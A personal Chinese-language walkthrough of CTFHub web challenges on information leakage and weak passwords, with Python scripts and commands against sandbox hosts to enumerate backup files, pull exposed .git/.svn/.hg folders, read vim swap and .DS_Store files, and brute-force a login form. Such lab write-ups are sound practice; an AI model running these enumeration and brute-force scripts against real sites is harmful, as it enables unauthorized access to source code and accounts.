以下內容只是自己做題的一個記錄,不喜勿噴;如有侵權,請私信我,我會及時處理
目錄
一、信息泄露
1、目錄遍歷
這裏通過觀察目錄的情況,發現目錄都是 /flag_in_here/1/%d 的樣式,於是構造腳本
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request
num_list = [i+1 for i in range(4)]
for i in num_list:
try:
res = urllib.request.urlopen("http://challenge-c127326ad3ea6854.sandbox.ctfhub.com:10080/flag_in_here/1/%d/flag.txt" % num_list[i])
except BaseException as e:
pass
else:
print(res.read().decode('utf-8'))
運行得到的結果是
ctfhub{1987f2dcecfe6cc28241015c225ce28c33aef1f7}
2、PHPINFO
由於題目提示頁面中將會直接出現flag,所以直接構建腳本
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request
import urllib.request
import re
rr = re.compile(r'\bctfhub{.*}', re.I)
res = urllib.request.urlopen("http://challenge-44154573da4f5713.sandbox.ctfhub.com:10080/phpinfo.php")
res_content = res.read().decode('utf-8')
print(rr.findall(res_content))
運行得到的結果是
['ctfhub{ba9c6833ed8b3648bdf86f7ea27c684237ce265e}', 'ctfhub{ba9c6833ed8b3648bdf86f7ea27c684237ce265e}']
3、備份文件下載
3.1、網站源碼
當開發人員在線上環境中對源代碼進行了備份操作,並且將備份文件放在了 web 目錄下,就會引起網站源碼泄露。
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request, urllib.parse
import zipfile, os
import re
rr = re.compile(r'\bctfhub{.*}', re.I)
def unzip_file(zip_src, dst_dir):
r = zipfile.is_zipfile(zip_src)
if r:
fz = zipfile.ZipFile(zip_src, 'r')
for file in fz.namelist():
fz.extract(file, dst_dir)
else:
print('看起來解壓的過程中出現了一點問題')
name_list1 = ['rar', 'tar.gz', 'tar', 'zip']
name_list2 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
name_list = []
for name1 in name_list1:
for name2 in name_list2:
name_list.append(name2 + "." + name1)
for names in name_list:
try:
res = urllib.request.urlopen('http://challenge-784af2e1b6c52d01.sandbox.ctfhub.com:10080/%s' %names)
except BaseException as e:
pass
else:
print("檢測到了%s" %names, "正在下載...")
f = open(names, 'wb')
f.write(res.read())
f.close()
print("下載完成")
zip_src = os.getcwd() + "\\" + names
dst_dir = os.getcwd()
unzip_file(zip_src,dst_dir)
print("解壓完成")
for name_dir in os.listdir():
try:
resp = urllib.request.urlopen('http://challenge-784af2e1b6c52d01.sandbox.ctfhub.com:10080/%s' %name_dir)
except BaseException as e:
pass
else:
res_content = resp.read().decode('utf-8')
if len(res_content) >= 60:
continue
else:
print("獲取到的flag爲:%s" %res_content)
break
運行得到的結果是
檢測到了www.zip 正在下載...
下載完成
解壓完成
獲取到的flag爲:ctfhub{a0f7e3a2630c76950dbceb4bad4f088cfd2efcb7}
3.2、bak文件
當開發人員在線上環境中對源代碼進行了備份操作,並且將備份文件放在了 web 目錄下,就會引起網站源碼泄露。
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request as ur
import re
rr = re.compile(r'\bctfhub{.*}', re.I)
res = ur.urlopen('http://challenge-9b444eeda7f6a455.sandbox.ctfhub.com:10080/index.php.bak')
res_content = res.read().decode('utf-8')
print(str(rr.findall(res_content))[2:-2])
運行得到的結果是
ctfhub{2235cea3ec81eb9569f4604251fe8a7120b95049}
3.3、vim緩存
當開發人員在線上環境中使用 vim 編輯器,在使用過程中會留下 vim 編輯器緩存,當vim異常退出時,緩存會一直留在服務器上,引起網站源碼泄露。
通常 vim 的備份文件有:
-
.filename.swp -
filename~ -
.filename.un.~
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request as ur, urllib.parse
import zipfile, os
import re
rr = re.compile(r'\bctfhub{.*}', re.I)
res = ur.urlopen('http://challenge-5aa8b1e1be6c5d78.sandbox.ctfhub.com:10080/.index.php.swp')
print(str(rr.findall(str(res.read())))[2:-2])
運行得到的結果是
ctfhub{67e244df614a707bf252d60711afef3767e41492}
3.4、.DS_Store
.DS_Store 是 Mac OS 保存文件夾的自定義屬性的隱藏文件。通過.DS_Store可以知道這個目錄裏面所有文件的清單。
這裏通過下面的地址直接獲取到文件
http://challenge-3092fd23a1d60f94.sandbox.ctfhub.com:10080/.DS_Store
然後通過Linux命令獲取文件內容
xxd -p DS_Store | sed 's/00//g' | tr -d '\n' | sed 's/\([0-9A-F]\{2\}\)/0x\1 /g' | xxd -r -p | strings | sed 's/ptb[LN]ustr//g'
得到的結果如下
Bud1
DSDB
$e536ae211065e6cb535b1a8080a2baa3.txtnoteustr
flag here!
接着構建腳本
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request as ur
res = ur.urlopen('http://challenge-3092fd23a1d60f94.sandbox.ctfhub.com:10080/e536ae211065e6cb535b1a8080a2baa3.txt')
print(res.read().decode('utf-8'))
運行得到的結果是
ctfhub{b00feb505c3f4e6df73d8612c76bd5deb5aa4475}
4、Git泄露
4.1、Log
當前大量開發人員使用git進行版本控制,對站點自動部署。如果配置不當,可能會將.git文件夾直接部署到線上環境。這就引起了git泄露漏洞。
➜ GitHack-master python GitHack.py http://challenge-426b1b2da4ddd315.sandbox.ctfhub.com:10080/.git/
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-426b1b2da4ddd315.sandbox.ctfhub.com:10080/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/mnt/c/Users/BinSec/Downloads/Compressed/GitHack-master/GitHack-master/dist/challenge-426b1b2da4ddd315.sandbox.ctfhub.com_10080'...
fatal: repository 'http://challenge-426b1b2da4ddd315.sandbox.ctfhub.com:10080/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-426b1b2da4ddd315.sandbox.ctfhub.com:10080/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/b5/aa9e47f5f2a2b02e23da913c5137976e36a716
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/90/f6b210fccb96c831fb0149bd777d02f2fdc5b9
[*] objects/9d/aceca66ad6be96b31ab966d60ca6e6beb02ebb
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] objects/ba/69d13b39c28abea7f0f7865d83d8cb6aa83b10
[*] objects/ac/48499ac2bda260e59471019e8506a71980f5a2
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /mnt/c/Users/BinSec/Downloads/Compressed/GitHack-master/GitHack-master/dist/challenge-426b1b2da4ddd315.sandbox.ctfhub.com_10080
然後進入到響應的文件夾查看git log
➜ GitHack-master cd dist/challenge-426b1b2da4ddd315.sandbox.ctfhub.com_10080
➜ challenge-426b1b2da4ddd315.sandbox.ctfhub.com_10080 git:(master) ✗ git log
運行得到的結果如下
commit b5aa9e47f5f2a2b02e23da913c5137976e36a716 (HEAD -> master)
Author: CTFHub <[email protected]>
Date: Sun Mar 15 12:54:22 2020 +0000
remove flag
commit 90f6b210fccb96c831fb0149bd777d02f2fdc5b9
Author: CTFHub <[email protected]>
Date: Sun Mar 15 12:54:22 2020 +0000
add flag
commit ba69d13b39c28abea7f0f7865d83d8cb6aa83b10
Author: CTFHub <[email protected]>
Date: Sun Mar 15 12:54:22 2020 +0000
init
(END)
當前所處的版本爲 remove flag,flag 在 add flag,我們就要切換版本
➜ challenge-426b1b2da4ddd315.sandbox.ctfhub.com_10080 git:(master) ✗ git reset --hard 90f6
HEAD is now at 90f6b21 add flag
➜ challenge-426b1b2da4ddd315.sandbox.ctfhub.com_10080 git:(master) ✗ ll
total 0
-rwxrwxrwx 1 kali kali 49 Mar 15 21:05 298682056511664.txt
-rwxrwxrwx 1 kali kali 494 Mar 15 21:05 50x.html
-rwxrwxrwx 1 kali kali 143 Mar 15 21:05 index.html
➜ challenge-426b1b2da4ddd315.sandbox.ctfhub.com_10080 git:(master) ✗ cat 298682056511664.txt
ctfhub{f0aa23ed987f7f88905579799a5f7da12f6cc491}
4.2、Stash
➜ GitHack-master python GitHack.py http://challenge-bcc954ebd1926525.sandbox.ctfhub.com:10080/.git/
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-bcc954ebd1926525.sandbox.ctfhub.com:10080/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/mnt/c/Users/BinSec/Downloads/Compressed/GitHack-master/GitHack-master/dist/challenge-bcc954ebd1926525.sandbox.ctfhub.com_10080'...
fatal: repository 'http://challenge-bcc954ebd1926525.sandbox.ctfhub.com:10080/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-bcc954ebd1926525.sandbox.ctfhub.com:10080/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/67/6ee2ab05e4e9190d1eb94e035ad00b23e6db3d
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/a3/b071375bbc6d7315c553d28efc9ddd16c79cbe
[*] objects/8a/3f858443df92e83814ad7d6340c786c1dbafaf
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] objects/0d/3c5e077dbbc36f7fc5fe0812c5d07173595749
[*] objects/e3/58b09f4cb4e5800dd20e1aa6758bf80811001a
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Fetch Commit Objects
[*] objects/06/36184b6082890f325e44990c6805a70f1dd06b
[*] objects/2d/78a2c68cc4d62aac1d07f4321a7d0385e026a6
[*] objects/e0/8222e5d2f251eb14754ed3b40d9a1ef2f639ed
[*] objects/6c/dfa192a6458d5c5611fe5eb44338b77d712bf2
[*] Fetch Commit Objects End
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /mnt/c/Users/BinSec/Downloads/Compressed/GitHack-master/GitHack-master/dist/challenge-bcc954ebd1926525.sandbox.ctfhub.com_10080
然後
➜ GitHack-master cd dist/challenge-bcc954ebd1926525.sandbox.ctfhub.com_10080
➜ challenge-bcc954ebd1926525.sandbox.ctfhub.com_10080 git:(master) ✗ git stash list
stash@{0}: WIP on master: a3b0713 add flag
#可以看到棧中有內容,直接彈出
➜ challenge-bcc954ebd1926525.sandbox.ctfhub.com_10080 git:(master) ✗ git stash pop
CONFLICT (modify/delete): 2677036325324.txt deleted in Updated upstream and modified in Stashed changes. Version Stashed changes of 2677036325324.txt left in tree.
The stash entry is kept in case you need it again.
➜ challenge-bcc954ebd1926525.sandbox.ctfhub.com_10080 git:(master) ✗ cat 2677036325324.txt
ctfhub{69ad3cdc7bae528787ead797f0ce24c24a2613fc}
4.3、index
當前大量開發人員使用git進行版本控制,對站點自動部署。如果配置不當,可能會將.git文件夾直接部署到線上環境。這就引起了git泄露漏洞。
➜ GitHack-master python GitHack.py http://challenge-858daa56ad3a890b.sandbox.ctfhub.com:10080/.git
____ _ _ _ _ _
/ ___(_) |_| | | | __ _ ___| | __
| | _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_| _ | (_| | (__| <
\____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
A '.git' folder disclosure exploit.
[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://challenge-858daa56ad3a890b.sandbox.ctfhub.com:10080/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
Cloning into '/mnt/c/Users/BinSec/Downloads/Compressed/GitHack-master/GitHack-master/dist/challenge-858daa56ad3a890b.sandbox.ctfhub.com_10080'...
fatal: repository 'http://challenge-858daa56ad3a890b.sandbox.ctfhub.com:10080/.git/' not found
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://challenge-858daa56ad3a890b.sandbox.ctfhub.com:10080/.git/ is not support Directory Listing
[-] [Skip][First Try] Target is not support Directory Listing
[*] Try to clone with Cache
[*] Initialize Git
[*] Cache files
[*] packed-refs
[*] config
[*] HEAD
[*] COMMIT_EDITMSG
[*] ORIG_HEAD
[*] FETCH_HEAD
[*] refs/heads/master
[*] refs/remote/master
[*] index
[*] logs/HEAD
[*] logs/refs/heads/master
[*] Fetch Commit Objects
[*] objects/28/24e1bbf84973508284fdb7e401b068d36ee5e9
[*] objects/f4/a95a1573c72e0ac3be354b13e7f7707d730384
[*] objects/be/0651e066fd7424d5469d34872219d0750469f9
[*] objects/01/2ae1fc6b838a345b689ae6bb4ec0edfd517a64
[*] objects/26/3f2708ef410c0e91c4bd6985ecaedd2a4a04c7
[*] objects/90/71e0a24f654c88aa97a2273ca595e301b7ada5
[*] objects/2c/59e3024e3bc350976778204928a21d9ff42d01
[*] Fetch Commit Objects End
[*] logs/refs/remote/master
[*] logs/refs/stash
[*] refs/stash
[*] Valid Repository
[+] Valid Repository Success
[+] Clone Success. Dist File : /mnt/c/Users/BinSec/Downloads/Compressed/GitHack-master/GitHack-master/dist/challenge-858daa56ad3a890b.sandbox.ctfhub.com_10080
查看一下就得到flag了
➜ GitHack-master cd /mnt/c/Users/BinSec/Downloads/Compressed/GitHack-master/GitHack-master/dist/challenge-858daa56ad3a890b.sandbox.ctfhub.com_10080
➜ challenge-858daa56ad3a890b.sandbox.ctfhub.com_10080 git:(master) ✗ ll
total 0
-rwxrwxrwx 1 kali kali 49 Mar 15 20:50 213531131228420.txt
-rwxrwxrwx 1 kali kali 494 Mar 15 20:50 50x.html
-rwxrwxrwx 1 kali kali 143 Mar 15 20:50 index.html
➜ challenge-858daa56ad3a890b.sandbox.ctfhub.com_10080 git:(master) ✗ cat 213531131228420.txt
ctfhub{8e1d7681a1a66c8b74d5a1b20b3a6b0d920589e2}
5、SVN
當開發人員使用 SVN 進行版本控制,對站點自動部署。如果配置不當,可能會將.svn文件夾直接部署到線上環境。這就引起了 SVN 泄露漏洞。
➜ dvcs-ripper-master sudo perl rip-svn.pl -u http://challenge-c523a500b40f2829.sandbox.ctfhub.com:10080/.svn/
[i] Found new SVN client storage format!
REP INFO => 1:file:///opt/svn/ctfhub:e43e7ef8-82fb-4194-9673-81c29de69c33
[i] Trying to revert the tree, if you get error, upgrade your SVN client!
Reverted 'index.html'
➜ dvcs-ripper-master ll -a
total 80K
drwxrwxrwx 1 kali kali 4.0K Mar 15 21:24 .
drwxrwxrwx 1 kali kali 4.0K Mar 15 21:21 ..
-rwxrwxrwx 1 kali kali 149 Oct 22 2018 .gitignore
-rwxrwxrwx 1 kali kali 3.8K Oct 22 2018 hg-decode.pl
-rwxrwxrwx 1 kali kali 221 Mar 15 21:24 index.html
-rwxrwxrwx 1 kali kali 18K Oct 22 2018 LICENSE
-rwxrwxrwx 1 kali kali 5.5K Oct 22 2018 README.md
-rwxrwxrwx 1 kali kali 6.3K Oct 22 2018 rip-bzr.pl
-rwxrwxrwx 1 kali kali 4.7K Oct 22 2018 rip-cvs.pl
-rwxrwxrwx 1 kali kali 15K Oct 22 2018 rip-git.pl
-rwxrwxrwx 1 kali kali 6.0K Oct 22 2018 rip-hg.pl
-rwxrwxrwx 1 kali kali 6.1K Oct 22 2018 rip-svn.pl
drwxrwxrwx 1 kali kali 4.0K Mar 15 21:24 .svn
#發現生成了.svn這個目錄,可以繼續查看
➜ dvcs-ripper-master tree .svn
.svn
├── entries
├── format
├── pristine
│ ├── bf
│ │ └── bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
│ └── c4
│ └── c4b3e18fe09fc3a63ec12c483c84012537bb5f2c.svn-base
├── text-base
├── tmp
├── wc.db
└── wc.db-journal
➜ pristine cat c4/c4b3e18fe09fc3a63ec12c483c84012537bb5f2c.svn-base bf/bf45c36a4dfb73378247a6311eac4f80f48fcb92.svn-base
ctfhub{1be4627619f2fd32babf97c15c0c93b1ce342934}
<html>
<head>
<meta charset="UTF-8" />
<title>CTFHub 信息泄露 SVN</title>
</head>
<body>
<h1>信息泄露 - Subversion</h1>
<br/>
<p>Flag 在服務端舊版本的源代碼中</p>
</body>
</html>%
得到了flag
ctfhub{1be4627619f2fd32babf97c15c0c93b1ce342934}
6、HG泄露
當開發人員使用 Mercurial 進行版本控制,對站點自動部署。如果配置不當,可能會將.hg 文件夾直接部署到線上環境。這就引起了 hg 泄露漏洞。
dvcs-ripper-master sudo perl rip-hg.pl -u http://challenge-cf7c8f19e3e86d74.sandbox.ctfhub.com:10080/.hg/
[i] Getting correct 404 responses
[i] Finished (2 of 12)
➜ dvcs-ripper-master cd .hg
➜ .hg tree
.
├── 00changelog.i
├── dirstate
├── last-message.txt
├── requires
├── store
│ ├── 00changelog.i
│ ├── 00manifest.i
│ ├── data
│ │ ├── 50x.html.i
│ │ └── index.html.i
│ ├── fncache
│ └── undo
├── undo.branch
├── undo.desc
├── undo.dirstate
└── wcache
├── checklink -> checklink-target
└── checklink-target
3 directories, 15 files
➜ .hg cat store/*
••or��������� (
���$•!�|���M�x�-�A
kx�•ɻtv••����e�����!β�•^:"(��_•I•,•�BR•�•F�-kD�H;���;��J�9��T�����uH{'�!�hM�TR•Y�5�•�••�>��
•1•@�>_�/X�L•DDa��^�A�PS��|���=�ȠXr•I �9)5�•���x!•(�!��}��|���۰��•��Iz}�<I�•���•�•�u�����nw�>���n
������" ••Yf��������H•�tw•��•���m'�Ȉ�*x�-�1•�@�>�@)-<�••M������x�1<�v�Ǣ�2K)•{�Z3�s�&ӱ•f•A����?6[�B�
6�•Ta�(��1$�Ü•*YI�•����;]xf$�|��z����uX�T22=flag_1027926131.txt52ec47b45f42236237d78a46be594c753f4754c7
cat: store/data: Is a directory
data/index.html.i
data/50x.html.i
data/flag_1027926131.txt.i
data/flag_1027926131.txt.i0
00manifest.i153
00changelog.i175
然後使用命令
➜ .hg curl http://challenge-cf7c8f19e3e86d74.sandbox.ctfhub.com:10080/flag_1027926131.txt
ctfhub{7858c2fb14bc35af6870bfecaa93fce0a4e7269b}
二、密碼口令
1、弱口令
大部分的場景下,用戶登陸都是POST請求提交表單,所以這裏也用Python3模擬提交一下表單,然後獲取登陸後的響應界面
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import requests
import re
import sys
f = open('Top100.txt', 'r')
content = []
for line in f.readlines():
content.append(line.strip())
pattern = '.*(ctfhub\{.*\})'
for username in content:
for password in content:
data = {
'name': username,
'password': password,
'referer': ''
}
res = requests.post(url="http://challenge-2f3b16498078855d.sandbox.ctfhub.com:10080", data=data)
flag = re.findall(pattern, res.text)
if len(str(flag)) >= 32:
print("獲取到flag的賬號是:%s 密碼是:%s flag爲:%s" %(username, password, flag[0]))
sys.exit()
else:
print("正在嘗試的賬戶名是:%s 密碼是:%s" % (username, password))
這裏給出弱口令裏面最好要有的幾個(爲了做題的話)
tiger、admin888、123456、password、admin、admin123